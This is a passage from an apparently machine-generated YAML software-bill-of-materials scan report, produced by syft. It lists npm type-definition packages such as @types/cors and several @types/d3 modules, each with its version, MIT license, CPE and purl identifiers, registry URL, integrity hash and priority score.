ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/caseless 0.12.5'
|
|
title: '@types/caseless 0.12.5'
|
|
description: 'Package discovered: @types/caseless 0.12.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7578f19b88adc968
|
|
name: '@types/caseless'
|
|
version: 0.12.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/caseless:\@types\/caseless:0.12.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/caseless@0.12.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/caseless/-/caseless-0.12.5.tgz
|
|
integrity: sha512-hWtVTC2q7hc7xZ/RLbxapMvDMgUnDvKvMOpKal4DrMyfGBUfB1oKaZlIRr6mJL+If3bAP6sV/QneGzF6tJjZDg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a5c07d1028c25891
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/cors 2.8.19'
|
|
title: '@types/cors 2.8.19'
|
|
description: 'Package discovered: @types/cors 2.8.19'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8b6775e086bda391
|
|
name: '@types/cors'
|
|
version: 2.8.19
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/cors:\@types\/cors:2.8.19:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/cors@2.8.19
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/cors/-/cors-2.8.19.tgz
|
|
integrity: sha512-mFNylyeyqN93lfe/9CSxOGREz8cpzAhH+E93xJ4xWQf62V8sQ/24reV2nyzUWM6H6Xji+GGHpkbLe7pVoUEskg==
|
|
dependencies:
|
|
'@types/node': '*'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d3e89ddbd967f67d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/d3-array 3.2.2'
|
|
title: '@types/d3-array 3.2.2'
|
|
description: 'Package discovered: @types/d3-array 3.2.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 59c0361f7de521dd
|
|
name: '@types/d3-array'
|
|
version: 3.2.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/d3-array:\@types\/d3-array:3.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3-array:\@types\/d3_array:3.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_array:\@types\/d3-array:3.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_array:\@types\/d3_array:3.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-array:3.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_array:3.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/d3-array@3.2.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/d3-array/-/d3-array-3.2.2.tgz
|
|
integrity: sha512-hOLWVbm7uRza0BYXpIIW5pxfrKe0W+D5lrFiAEYR+pb6w3N2SwSMaJbXdUfSEv+dT4MfHBLtn5js0LAWaO6otw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4a5d6407d36c3dfe
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/d3-color 3.1.3'
|
|
title: '@types/d3-color 3.1.3'
|
|
description: 'Package discovered: @types/d3-color 3.1.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ad88e8187765d8aa
|
|
name: '@types/d3-color'
|
|
version: 3.1.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/d3-color:\@types\/d3-color:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3-color:\@types\/d3_color:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_color:\@types\/d3-color:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_color:\@types\/d3_color:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-color:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_color:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/d3-color@3.1.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/d3-color/-/d3-color-3.1.3.tgz
|
|
integrity: sha512-iO90scth9WAbmgv7ogoq57O9YpKmFBbmoEoCHDB2xMBY0+/KVrqAaCDyCE16dUspeOvIxFFRI+0sEtqDqy2b4A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 075de1dd01220805
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/d3-ease 3.0.2'
|
|
title: '@types/d3-ease 3.0.2'
|
|
description: 'Package discovered: @types/d3-ease 3.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: df6234ea1d1790c8
|
|
name: '@types/d3-ease'
|
|
version: 3.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/d3-ease:\@types\/d3-ease:3.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3-ease:\@types\/d3_ease:3.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_ease:\@types\/d3-ease:3.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_ease:\@types\/d3_ease:3.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-ease:3.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_ease:3.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/d3-ease@3.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/d3-ease/-/d3-ease-3.0.2.tgz
|
|
integrity: sha512-NcV1JjO5oDzoK26oMzbILE6HW7uVXOHLQvHshBUW4UMdZGfiY6v5BeQwh9a9tCzv+CeefZQHJt5SRgK154RtiA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ac33d3528c07735d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/d3-interpolate 3.0.4'
|
|
title: '@types/d3-interpolate 3.0.4'
|
|
description: 'Package discovered: @types/d3-interpolate 3.0.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d2cfc65d37d7fda7
|
|
name: '@types/d3-interpolate'
|
|
version: 3.0.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/d3-interpolate:\@types\/d3-interpolate:3.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3-interpolate:\@types\/d3_interpolate:3.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_interpolate:\@types\/d3-interpolate:3.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_interpolate:\@types\/d3_interpolate:3.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-interpolate:3.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_interpolate:3.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/d3-interpolate@3.0.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/d3-interpolate/-/d3-interpolate-3.0.4.tgz
|
|
integrity: sha512-mgLPETlrpVV1YRJIglr4Ez47g7Yxjl1lj7YKsiMCb27VJH9W8NVM6Bb9d8kkpG/uAQS5AmbA48q2IAolKKo1MA==
|
|
dependencies:
|
|
'@types/d3-color': '*'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9ef37f1ec9a73980
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/d3-path 3.1.1'
|
|
title: '@types/d3-path 3.1.1'
|
|
description: 'Package discovered: @types/d3-path 3.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0128eed2457b60d1
|
|
name: '@types/d3-path'
|
|
version: 3.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/d3-path:\@types\/d3-path:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3-path:\@types\/d3_path:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_path:\@types\/d3-path:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_path:\@types\/d3_path:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-path:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_path:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/d3-path@3.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/d3-path/-/d3-path-3.1.1.tgz
|
|
integrity: sha512-VMZBYyQvbGmWyWVea0EHs/BwLgxc+MKi1zLDCONksozI4YJMcTt8ZEuIR4Sb1MMTE8MMW49v0IwI5+b7RmfWlg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b363e223fe02334b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/d3-scale 4.0.9'
|
|
title: '@types/d3-scale 4.0.9'
|
|
description: 'Package discovered: @types/d3-scale 4.0.9'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6f0b81bc9d69ce92
|
|
name: '@types/d3-scale'
|
|
version: 4.0.9
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/d3-scale:\@types\/d3-scale:4.0.9:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3-scale:\@types\/d3_scale:4.0.9:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_scale:\@types\/d3-scale:4.0.9:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_scale:\@types\/d3_scale:4.0.9:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-scale:4.0.9:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_scale:4.0.9:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/d3-scale@4.0.9
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/d3-scale/-/d3-scale-4.0.9.tgz
|
|
integrity: sha512-dLmtwB8zkAeO/juAMfnV+sItKjlsw2lKdZVVy6LRr0cBmegxSABiLEpGVmSJJ8O08i4+sGR6qQtb6WtuwJdvVw==
|
|
dependencies:
|
|
'@types/d3-time': '*'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 22226a3e628ac76c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/d3-shape 3.1.8'
|
|
title: '@types/d3-shape 3.1.8'
|
|
description: 'Package discovered: @types/d3-shape 3.1.8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 533995aeaf2ae857
|
|
name: '@types/d3-shape'
|
|
version: 3.1.8
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/d3-shape:\@types\/d3-shape:3.1.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3-shape:\@types\/d3_shape:3.1.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_shape:\@types\/d3-shape:3.1.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_shape:\@types\/d3_shape:3.1.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-shape:3.1.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_shape:3.1.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/d3-shape@3.1.8
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/d3-shape/-/d3-shape-3.1.8.tgz
|
|
integrity: sha512-lae0iWfcDeR7qt7rA88BNiqdvPS5pFVPpo5OfjElwNaT2yyekbM0C9vK+yqBqEmHr6lDkRnYNoTBYlAgJa7a4w==
|
|
dependencies:
|
|
'@types/d3-path': '*'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e91025b60bc33c45
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/d3-time 3.0.4'
|
|
title: '@types/d3-time 3.0.4'
|
|
description: 'Package discovered: @types/d3-time 3.0.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d051a01827d6eb95
|
|
name: '@types/d3-time'
|
|
version: 3.0.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/d3-time:\@types\/d3-time:3.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3-time:\@types\/d3_time:3.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_time:\@types\/d3-time:3.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_time:\@types\/d3_time:3.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-time:3.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_time:3.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/d3-time@3.0.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/d3-time/-/d3-time-3.0.4.tgz
|
|
integrity: sha512-yuzZug1nkAAaBlBBikKZTgzCeA+k1uy4ZFwWANOfKw5z5LRhV0gNA7gNkKm7HoK+HRN0wX3EkxGk0fpbWhmB7g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 83378a6b374bc40d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/d3-timer 3.0.2'
|
|
title: '@types/d3-timer 3.0.2'
|
|
description: 'Package discovered: @types/d3-timer 3.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a9187c78265f1b66
|
|
name: '@types/d3-timer'
|
|
version: 3.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/d3-timer:\@types\/d3-timer:3.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3-timer:\@types\/d3_timer:3.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_timer:\@types\/d3-timer:3.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3_timer:\@types\/d3_timer:3.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-timer:3.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_timer:3.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/d3-timer@3.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/d3-timer/-/d3-timer-3.0.2.tgz
|
|
integrity: sha512-Ps3T8E8dZDam6fUyNiMkekK3XUsaUEik+idO9/YjPtfj2qruF8tFBXS7XhtE4iIXBLxhmLjP3SXpLhVf21I9Lw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
